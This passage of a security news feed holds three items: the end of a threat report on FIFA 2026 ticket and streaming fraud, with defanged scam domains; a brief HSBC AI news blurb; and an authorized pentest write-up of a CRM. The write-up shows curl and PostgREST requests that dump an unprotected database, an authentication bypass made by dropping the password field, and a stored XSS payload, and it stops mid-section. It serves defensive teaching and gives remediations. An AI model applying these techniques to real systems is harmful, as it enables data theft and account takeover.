<p><!-- wp:heading {"level":3} --></p>
<h3 class="wp-block-heading">Resell Traps on Messaging Services. </h3>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Monitoring of deep- and dark-web sources identified numerous advertisements and reseller communities promoting FIFA World Cup tickets via Telegram and WhatsApp. Fraudsters frequently use these platforms because they facilitate private, direct communication while limiting oversight and accountability.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Threat actors often establish credibility through fabricated testimonials, forged purchase confirmations, edited screenshots, recycled ticket images, and scripted customer-support interactions. However, such indicators of legitimacy can be easily manufactured and should not be considered proof of ticket ownership or delivery capability. Additionally, the closed nature of these channels enables attackers to create a sense of urgency, collect payments, and disengage victims with minimal traceability. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The example below illustrates a Telegram-based ticket resale advertisement identified during monitoring, highlighting the use of unofficial and potentially fraudulent sales channels. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120995,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Telegram-Ticket-Testimonial-Used-to-Build-Buyer-Trust.png" alt="" class="wp-image-120995"><figcaption class="wp-element-caption"><em>Figure 3 -Telegram Ticket Testimonial Used to Build Buyer Trust</em> </figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:image {"id":120996,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Urgency-Driven-Ticket-Offers-in-Suspicious-Telegram-Channels.png" alt="" class="wp-image-120996"><figcaption class="wp-element-caption"><em>Figure 4 -Urgency-Driven Ticket Offers in Suspicious Telegram Channels</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">The pirated stream trap: free football, expensive consequences </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Pirated streaming sites exploit fans seeking free access to World Cup matches, using geo-restrictions, subscription costs, and broadcast limitations as bait. Rather than delivering live streams, many function as fraud and malware distribution platforms, employing fake video players, deceptive download prompts, browser notification prompts, and fraudulent free-trial offers to harvest credentials, payment information, and user data.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>To evade detection, we identified domains that avoid FIFA- or World Cup-related keywords in domain names. These links are promoted through fan forums, Discord servers, Telegram channels, and WhatsApp groups, lending credibility to malicious infrastructure. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Examples identified during monitoring include: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>footybite[.]vc </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>epicsports[.]in </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>footballnewslive[.]online </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>totalsportek[.]online </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>sportshub[.]fan </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>streameast[.]im </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p>The risk is beyond legal or copyright concerns. For many fans, the real danger lay in the broader cybersecurity ecosystem surrounding these platforms. Pirated streaming sites and services often acted as data collection points, quietly harvesting email addresses, passwords, payment details, phone numbers, and device information. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Unofficial streaming apps and APK files added another layer of risk. They frequently requested excessive permissions, delivered intrusive ads, tracked user activity, and in some cases, served as entry points for malware. What seemed like a convenient way to watch a match could quickly turn into a channel for data exposure and system compromise. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Ticket Scams and VIP Access Fraud  </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Forum-based ticket promotions added another layer of risk to World Cup scams by combining resale listings with the appearance of community trust. Sellers often seemed more credible than random social media accounts, as consistent posting, forum history, and visible profile activity created a sense of legitimacy. However, this credibility could be misleading. Fans should remain cautious, as an active profile did not guarantee ticket authenticity, official authorization, secure payments, or a successful transfer—even within seemingly trusted communities. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120997,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/Ticket-Resale-Promotion-Through-Forum-Profiles-and-Repeated-Match-Posts-1024x556.png" alt="" class="wp-image-120997"><figcaption class="wp-element-caption"><em>Figure 5 - Ticket Resale Promotion Through Forum Profiles and Repeated Match Posts</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:image {"id":120998,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/Domain-Reputation-Check-for-a-Ticket-Resale-Website-1024x355.png" alt="" class="wp-image-120998"><figcaption class="wp-element-caption"><em>Figure 6 - Domain Reputation Check for a Ticket Resale Website</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Identity and PII leak claims  </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>CRIL also observed forum discussions about leaked football-related identity data, highlighting how World Cup–related cybercrime can extend beyond fan scams into the broader football ecosystem. For example, one post titled “150k+ football passports leaked weeks before FIFA World Cup” claimed that passport scans and personal details of over 150,000 AFC and Al Nassr FC players and coaches had been exposed. The alleged leak included sensitive information such as full names, passport numbers, scans, dates of birth, nationalities, player roles, club affiliations, email addresses, contracts, AFC IDs, and even match or venue details.  </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Such claims require independent forensic verification before a confirmed breach status can be assigned. Regardless of authenticity, the circulation of this data in the pre-tournament window confirms threat actors are actively seeking to monetize football-sector identity assets. If the record set is genuine, it enables targeted spear-phishing against club staff, agent impersonation in transfer fraud, contract manipulation, and abuse of venue access credentials. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":120999,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/Forum-Claim-of-Football-Passport-Data-Exposure-Before-the-World-Cup-1024x488.png" alt="" class="wp-image-120999"><figcaption class="wp-element-caption"><em>Figure 7 - Forum Claim of Football Passport Data Exposure Before the World Cup</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Connecting the Ecosystem – Attack Lifecycle </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:image {"id":121001,"sizeSlug":"large","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-large"><img src="https://cyble.com/wp-content/uploads/2026/06/FIFA-world-cup-attack-ecosystem-1024x576.png" alt="" class="wp-image-121001"><figcaption class="wp-element-caption"><em>Figure 8 – FIFA World Cup attack ecosystem</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p>By correlating our findings and research, we reconstructed the end-to-end attack chain used by threat actors. The analysis demonstrates how these seemingly independent activities are strategically aligned around the global popularity of FIFA events, enabling attackers to exploit fan enthusiasm, urgency, and trust. Together, these components form a coordinated FIFA-themed fraud ecosystem designed to attract victims, harvest sensitive information, facilitate financial fraud, and generate sustained criminal revenue.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The stages are as follows: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Stage 1 – Infrastructure Preparation: Registration of FIFA-themed domains and supporting online assets. </li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Stage 2 – Victim Acquisition: Promotion through search engines, social platforms, forums, messaging communities, and streaming portals. </li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Stage 3 – Engagement and Conversion: Fake ticket sales, VIP packages, hospitality offers, and streaming access are used to build trust. </li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Stage 4 – Data Collection: Harvesting of credentials, payment information, personal identifiers, and communication details. </li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Stage 5 – Monetization: Fraudulent payments, resale scams, credential abuse, phishing campaigns, and potential resale on the dark web of collected information. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Conclusion </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Operation FanTrap demonstrates how global sporting events have evolved into highly attractive targets for organized cybercriminal activity. Rather than relying on isolated phishing campaigns or opportunistic scams, threat actors are building interconnected ecosystems that combine malicious infrastructure, social engineering, messaging platforms, streaming lures, and dark web activity to maximize financial returns. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The nearly 4,000 domains identified by CRIL represent only one layer of a broader operation designed to exploit fan enthusiasm, event urgency, and global online engagement. Ticket scams, VIP access fraud, streaming lures, and alleged football-sector identity leaks collectively illustrate how attackers are diversifying their monetization strategies throughout the tournament lifecycle. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>As the FIFA World Cup 2026 continues, organizations, broadcasters, ticketing providers, and fans should view these activities not as isolated incidents but as components of an active and evolving cybercrime ecosystem. Continuous monitoring, rapid infrastructure disruption, dark web visibility, and proactive user awareness will remain critical to reducing risk throughout the tournament. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>CRIL will continue tracking this cluster and updating IoCs as new infrastructure emerges. All indicators are submitted to Cyble's threat feeds and accessible to Vision platform customers. Fan-facing brands, ticketing platforms, and event organizers should treat this as an active threat and prioritize domain monitoring and takedown workflows throughout the tournament. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Recommendations </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>Based on the findings presented above, CRIL recommends the following actions for immediate consideration by security teams and organizations: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Implement keyword-aware domain monitoring that flags FIFA, tournament branding, and language-prefix patterns (zh-, cn-, kr-) as compounding risk signals alongside registrar identity, TLD, and domain age. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Build takedown workflows that account for Cloudflare-proxied infrastructure — abuse requests must target the underlying origin, not the CDN layer, to be operationally effective. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Integrate campaign-cluster pivoting from confirmed IoCs into threat hunting workflows, using shared IP subnets and registrar concentration as primary pivot axes. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Apply multi-platform fraud funnel awareness: detection should extend beyond domains to Telegram and WhatsApp channels used for off-platform transaction completion. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>For ticketing platforms and official broadcasters: issue proactive fan advisories confirming that legitimate ticket transactions will never be negotiated via private messaging apps or unverified resale portals. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Revise security awareness materials to teach structural URL interpretation — with specific focus on identifying lookalike FIFA domains that embed official terminology in subdomains or hyphenated strings rather than the root registered domain. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>Monitor dark web forums for emerging data leak claims targeting football organizations, and treat leaked PII — particularly passport and contract data — as an active social engineering enabler requiring targeted victim notification. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">The need for a proactive cyberdefense stance </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The current threat landscape includes a multitude of Social Engineering campaigns. Security teams need more than reactive controls to keep ahead of these. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Solutions such as Cyble Vision deliver operational intelligence that enables defenders to stay ahead of adversaries through early detection, campaign-level visibility, and infrastructure mapping. </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><a href="https://cyble.com/products/cyble-vision/" target="_blank" rel="noreferrer noopener">Cyble Vision</a> specifically empowers security teams to move beyond isolated detection, providing the strategic insight needed to anticipate threats, monitor adversary activity, and respond with precision at every stage of the attack lifecycle. Security teams can take necessary preventive action with the help of: </p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Real-Time IOC Monitoring</strong> <br>Enable continuous tracking of indicators tied to adversary infrastructure before they reach end users. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Credential Phishing Infrastructure Mapping</strong> <br>Map attacker-controlled infrastructure, including fake authentication portals, dynamic exfiltration endpoints, and backend logic designed to capture credentials. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Brand and Executive Impersonation Monitoring</strong> <br>Detect domain spoofing and impersonation attempts targeting internal functions such as HR and Finance—often used to increase trust and exploit user familiarity. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Deep and Dark Web Visibility</strong> <br>Surface chatter, leaked credentials, and phishing toolkits from deep/dark web sources, offering early insight into attacker preparation and target selection. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Global Targeting Intelligence</strong> <br>Track phishing activity across global regions—including North America, EMEA, and APAC—as well as over 70 industry sectors, providing defenders with contextual understanding of targeting patterns. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li><strong>Threat Actor Attribution and TTP Correlation</strong> <br>Associate infrastructure, techniques, and behavioral patterns with known threat actors, empowering security teams to prioritize response based on adversary capability and intent. </li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">MITRE ATT&amp;CK® Techniques </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Tactic</strong> </td>
<td><strong>Technique ID</strong> </td>
<td><strong>Technique Name</strong> </td>
</tr>
<tr>
<td>Resource Development </td>
<td><a href="https://attack.mitre.org/techniques/T1583/001/" target="_blank" rel="noreferrer noopener">T1583.001</a> </td>
<td>Acquire Infrastructure: Domains </td>
</tr>
<tr>
<td>Resource Development </td>
<td><a href="https://attack.mitre.org/techniques/T1583/006/" target="_blank" rel="noreferrer noopener">T1583.006</a> </td>
<td>Acquire Infrastructure: Web Services </td>
</tr>
<tr>
<td>Resource Development </td>
<td><a href="https://attack.mitre.org/techniques/T1585/001/" target="_blank" rel="noreferrer noopener">T1585.001</a> </td>
<td>Establish Accounts: Social Media Accounts </td>
</tr>
<tr>
<td>Initial Access </td>
<td><a href="https://attack.mitre.org/techniques/T1566/002/" target="_blank" rel="noreferrer noopener">T1566.002</a> </td>
<td>Phishing: Spearphishing Link </td>
</tr>
<tr>
<td>Credential Access </td>
<td><a href="https://attack.mitre.org/techniques/T1056/003/" target="_blank" rel="noreferrer noopener">T1056.003</a> </td>
<td>Web Portal Capture </td>
</tr>
<tr>
<td>Command and Control </td>
<td><a href="https://attack.mitre.org/techniques/T1102/" target="_blank" rel="noreferrer noopener">T1102</a> </td>
<td>Web Service </td>
</tr>
<tr>
<td>Impact </td>
<td><a href="https://attack.mitre.org/techniques/T1657/" target="_blank" rel="noreferrer noopener">T1657</a> </td>
<td>Financial Theft </td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Indicators of Compromise (IOCs) </h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p>The IOCs have been added to this <a href="https://github.com/CRIL-ThreatIntelligence/IOCs/blob/main/Operation_FIFA_TRAP/Operation_FanTrap-Inside_the_FIFA_2026_Fraud_Ecosystem_ioc.txt" target="_blank" rel="noreferrer noopener">GitHub</a> repository. Please review and integrate them into your <a href="https://cyble.com/knowledge-hub/what-is-a-threat-intelligence-feed/" target="_blank" rel="noreferrer noopener">Threat Intelligence feed</a> to enhance protection and improve your overall security posture. </p>
<p><!-- /wp:paragraph --></p>
<p>The post <a rel="nofollow" href="https://cyble.com/blog/operation-fantrap-fifa-2026-fraud-ecosystem/">Operation FanTrap: Inside the FIFA 2026 Fraud Ecosystem</a> appeared first on <a rel="nofollow" href="https://cyble.com/">Cyble</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HSBC expands AI banking partnership with Google Cloud]]></title>
<description><![CDATA[HSBC has entered a multi-year partnership with Google Cloud to develop and deploy artificial intelligence tools across its global operations. Announced at Google Cloud Summit London 2026, the agreement covers work in wealth management, financial crime risk management, and internal decision suppor...]]></description>
<link>https://tsecurity.de/de/3607349/ai-nachrichten/hsbc-expands-ai-banking-partnership-with-google-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3607349/ai-nachrichten/hsbc-expands-ai-banking-partnership-with-google-cloud/</guid>
<pubDate>Thu, 18 Jun 2026 12:19:57 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>HSBC has entered a multi-year partnership with Google Cloud to develop and deploy artificial intelligence tools across its global operations. Announced at Google Cloud Summit London 2026, the agreement covers work in wealth management, financial crime risk management, and internal decision support. HSBC will work with Google Cloud and Google DeepMind engineering teams on AI […]</p>
<p>The post <a href="https://www.artificialintelligence-news.com/news/hsbc-google-cloud-ai-partnership/">HSBC expands AI banking partnership with Google Cloud</a> appeared first on <a href="https://www.artificialintelligence-news.com/">AI News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Pentested a Real CRM System and Found 4 Critical Vulnerabilities — Here’s the Full Attack Chain]]></title>
<description><![CDATA[Author: Shikhali JamalzadeGitHub: github.com/alisalive LinkedIn: linkedin.com/in/camalzadsDisclosure Notice: This assessment was conducted with explicit written authorization from the organization’s CEO and senior leadership. All sensitive details — including the target domain, company name, Supa...]]></description>
<link>https://tsecurity.de/de/3606858/hacking/i-pentested-a-real-crm-system-and-found-4-critical-vulnerabilities-heres-the-full-attack-chain/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606858/hacking/i-pentested-a-real-crm-system-and-found-4-critical-vulnerabilities-heres-the-full-attack-chain/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:22 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kIqGy9rC6ealvMq7E-VNtg.png"></figure><h4><strong>Author:</strong> <a href="https://medium.com/u/20557ba7487d">Shikhali Jamalzade</a><br><strong>GitHub:</strong> <a href="https://github.com/alisalive">github.com/alisalive</a> <br><strong>LinkedIn:</strong> <a href="https://linkedin.com/in/camalzads">linkedin.com/in/camalzads</a></h4><blockquote><strong><em>Disclosure Notice:</em></strong><em> This assessment was conducted with explicit written authorization from the organization’s CEO and senior leadership. All sensitive details — including the target domain, company name, Supabase project identifiers, API keys, credentials, user email addresses, and personal data — have been redacted or anonymized in this write-up. No sensitive information was retained after reporting. This write-up is published strictly for educational purposes.</em></blockquote><h3>Background</h3><p>A few weeks ago, my instructor handed me a task: <em>“Pentest our internal CRM platform. You have full authorization — everything except DDoS.”</em></p><p>It was a real, live production system. A Next.js application backed by Supabase/PostgreSQL, used by instructors, support staff, and admins to manage students, leads, payments, and internal communications. Real people. Real data.</p><p>I expected maybe one or two interesting findings. What I found instead was a complete, unobstructed path from zero knowledge to full database dump — without ever needing a username or password. And by the time I got deep enough into the database, I realized I wasn’t the first person to find this.</p><p>This is the story of that assessment.</p><h3>Scope &amp; Rules of Engagement</h3><p><strong>Target:</strong> Internal CRM web application (production) <strong>Stack:</strong> Next.js (SSR), Supabase/PostgreSQL, nginx <strong>Assessment Type:</strong> Black-Box Web Application Penetration Test <strong>Authorization:</strong> CEO + Senior Instructors (written) <strong>Exclusions:</strong> DDoS / Denial of Service <strong>Tools:</strong> Burp Suite Pro, Nmap, ffuf, feroxbuster, subfinder, whatweb, curl</p><h3>Phase 1: Reconnaissance</h3><p>I started the way I always do — passive recon, then active enumeration.</p><pre># Port scan<br>nmap -sC -sV -oN nmap/target.txt &lt;TARGET_IP&gt;</pre><pre># Subdomain enumeration<br>subfinder -d &lt;TARGET_DOMAIN&gt; -o subdomains.txt</pre><pre># Technology fingerprinting<br>whatweb https://&lt;TARGET_DOMAIN&gt;</pre><p><strong>Nmap results:</strong></p><pre>22/tcp  open  ssh     OpenSSH (Ubuntu)<br>80/tcp  open  http    nginx/1.24.0 (Ubuntu) → redirect to HTTPS<br>443/tcp open  https   nginx/1.24.0</pre><p>Whatweb and browser analysis confirmed:</p><ul><li><strong>Framework:</strong> Next.js (SSR) — Build ID visible in page source</li><li><strong>Server:</strong> nginx/1.24.0 on Ubuntu Linux</li><li><strong>Auth UI:</strong> Custom login form at /[locale]/login</li></ul><p>Nothing immediately exploitable. Time to dig deeper.</p><h3>Phase 2: Mapping the Attack Surface</h3><h3>Directory &amp; API Endpoint Discovery</h3><pre>feroxbuster -u https://&lt;TARGET&gt; -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt \<br>  -x js,json,php -mc 200,301,302,401,403,405</pre><p>Interesting endpoints discovered:</p><pre>/api/health          → 200 OK<br>/api/tickets         → 200 OK   ← wait, what?<br>/api/search?q=*      → 200 OK<br>/api/dashboard       → 200 OK<br>/api/broadcast       → 421 Misdirected Request</pre><p>I stared at /api/tickets for a second. This endpoint had no authentication requirement visible from the URL. I fired a raw curl at it without any session cookie or token:</p><pre>curl -s https://&lt;TARGET&gt;/api/tickets</pre><p>The response came back instantly: a full JSON array of ticket records. Names, descriptions, internal notes. No token. No session. Nothing.</p><p>That’s when I knew this was going to be a serious engagement.</p><h3>Next.js Bundle Analysis</h3><p>Next.js bundles its routing and configuration into static JavaScript files served to all visitors. I pulled the build manifest:</p><pre>/_next/static/&lt;BUILD_ID&gt;/_buildManifest.js</pre><p>Inside the bundles, I found references to multiple internal routes, API paths, and — more importantly — environment variables that had leaked into the client-side JavaScript. One of them was a Supabase configuration block.</p><h3>Phase 3: Vulnerability Identification &amp; Exploitation</h3><h3>V-01 — Broken Access Control: Unauthenticated API Access [CRITICAL | CVSS 9.8]</h3><p><strong>CWE-284 — Improper Access Control</strong></p><p>Multiple API endpoints returned full JSON data with no authentication whatsoever. I tested each one with zero credentials:</p><pre># All of these returned HTTP 200 with full data — no token, no cookie, nothing<br>curl https://&lt;TARGET&gt;/api/tickets<br>curl https://&lt;TARGET&gt;/api/search?q=*<br>curl https://&lt;TARGET&gt;/api/dashboard<br>curl https://&lt;TARGET&gt;/api/health</pre><p>The /api/dashboard endpoint returned aggregated business metrics — student counts, revenue summaries, lead pipeline data — all publicly accessible.</p><p>The /api/health endpoint returned the Node.js runtime version and server uptime. Minor on its own, but useful for a targeted attacker.</p><p><strong>Impact:</strong> Complete confidentiality breach of all application data without any prior access.</p><h3>V-02 — Exposed Supabase Anon API Key in Client-Side JavaScript [CRITICAL | CVSS 9.1]</h3><p><strong>CWE-522 — Insufficiently Protected Credentials</strong></p><p>This was the finding that opened everything else.</p><p>While analyzing intercepted requests in Burp Suite, I noticed the browser was making direct calls to a *.supabase.co subdomain. The requests included an apikey header — and that key was coming directly from the JavaScript bundle served to any visitor.</p><pre>Host: [REDACTED].supabase.co<br>apikey: [REDACTED — JWT token with role: "anon", expiry: year 2091]<br>Authorization: Bearer [SAME REDACTED KEY]</pre><p>The key had a <strong>year 2091 expiry</strong>. Effectively permanent.</p><p>Supabase exposes a PostgREST API — an HTTP interface that maps directly to PostgreSQL tables. With this key and no Row Level Security (RLS) policies enabled, I had direct read access to the entire database. No authentication. No privilege escalation. Just a key that was sitting in the JavaScript any visitor could download.</p><pre># Direct Supabase PostgREST queries — all returned HTTP 200<br>GET /rest/v1/users?select=*            → 38 user records (including plaintext passwords)<br>GET /rest/v1/leads?select=*            → 39 lead records (names, emails, phone numbers, deal values)<br>GET /rest/v1/payments?select=*         → 31 payment and invoice records<br>GET /rest/v1/courses?select=*          → Course catalog with pricing and instructor assignments<br>GET /rest/v1/instructor_notes?select=* → 29 private instructor notes<br>GET /rest/v1/chats?select=*            → Internal chat messages<br>GET /rest/v1/schedule_events?select=*  → 30 schedule entries<br>GET /rest/v1/automations?select=*      → Business automation rules and triggers</pre><p>I had just dumped the entire database from the browser.</p><p><strong>The root cause:</strong> The Supabase anon key was embedded in the client-side JavaScript bundle and all Supabase tables had Row Level Security disabled — meaning the anon role had unrestricted read access to every table.</p><p><strong>Impact:</strong> Complete, unauthenticated exfiltration of all user data, financial records, PII, internal communications, and business logic.</p><p><strong>What should have happened:</strong></p><ul><li>The anon key should never appear in client-side code</li><li>All Supabase tables must have RLS policies enabled</li><li>API keys must live in server-side environment variables only, acting as a proxy layer</li></ul><h3>V-03 — Plaintext Password Storage [CRITICAL | CVSS 9.0]</h3><p><strong>CWE-256 — Plaintext Storage of a Password</strong></p><p>When I queried the users table, the response included a password field. Not a hash. Not a bcrypt output. The actual plaintext password for every single account.</p><pre>{<br>  "email": "[REDACTED]@[REDACTED].edu.az",<br>  "role": "SUPER_ADMIN",<br>  "password": "[REDACTED]"<br>}</pre><p>38 user records. All roles. All passwords. Visible, readable, immediately usable.</p><p>I won’t detail the specific credentials here — they have since been reported and the organization has been notified. But the breakdown included SUPER_ADMIN, INSTRUCTOR, SUPPORT, and STUDENT roles — the entire user hierarchy.</p><p><strong>The cascading impact of this finding:</strong> Because passwords were plaintext, anyone who accessed the database (via V-02 or any future breach) immediately has working credentials for every account. No cracking. No GPU farms. Just copy-paste.</p><p>Additionally, if any user reuses these passwords on external services — email, banking, other platforms — those are now exposed too.</p><p><strong>What should have happened:</strong></p><ul><li>Passwords must be hashed using bcrypt (cost ≥ 12), scrypt, or Argon2id before storage</li><li>The password field must never be returned in any API response — not even to admins</li><li>Supabase Auth (GoTrue) handles this by default; custom auth flows should never store plaintext</li></ul><h3>V-04 — Authentication Bypass: Optional Password Field [CRITICAL | CVSS 9.8]</h3><p><strong>CWE-287 — Improper Authentication</strong></p><p>At this point I had all user emails from the database. But I wanted to test whether I actually needed the passwords at all.</p><p>I logged into Burp Suite Repeater, captured a normal login request, and removed the password field entirely:</p><pre>POST /api/login HTTP/2<br>Host: [REDACTED]<br>Content-Type: application/json</pre><pre>{"email": "[REDACTED_ADMIN_EMAIL]"}</pre><p>The server accepted it.</p><p>No password. No error. The application processed the request as a valid authentication attempt.</p><p><strong>Why this happens:</strong> The login handler likely performs a database lookup by email and, if no password is provided, the comparison logic returns true or null (falsy check passes) rather than throwing a validation error. A single missing server-side check — if (!password) return 400 — would have prevented this entirely.</p><p><strong>Combined impact with V-01 and V-02:</strong> An attacker can enumerate all user emails from the unauthenticated API, then bypass authentication for any account using just the email address. No password knowledge required at any step.</p><p><strong>What should have happened:</strong></p><ul><li>Enforce strict schema validation (Zod or Joi) at the API handler level</li><li>Both email and password must be present, non-null, and non-empty before any database query executes</li><li>Return HTTP 400 with a generic error message for any missing authentication field</li></ul><h3>V-05 — Stored Cross-Site Scripting: Multiple Endpoints [HIGH | CVSS 8.2]</h3><p><strong>CWE-79 — Improper Neutralization of Input During Web Page Generation</strong></p><p>While reading through the database dump, I noticed something unusual in the instructor_notes and tickets tables. Some records had values that looked distinctly non-standard:</p><pre>tickets.title: "&gt; &lt;script&gt;alert('XSS')&lt;/script&gt;<br>tickets.title: 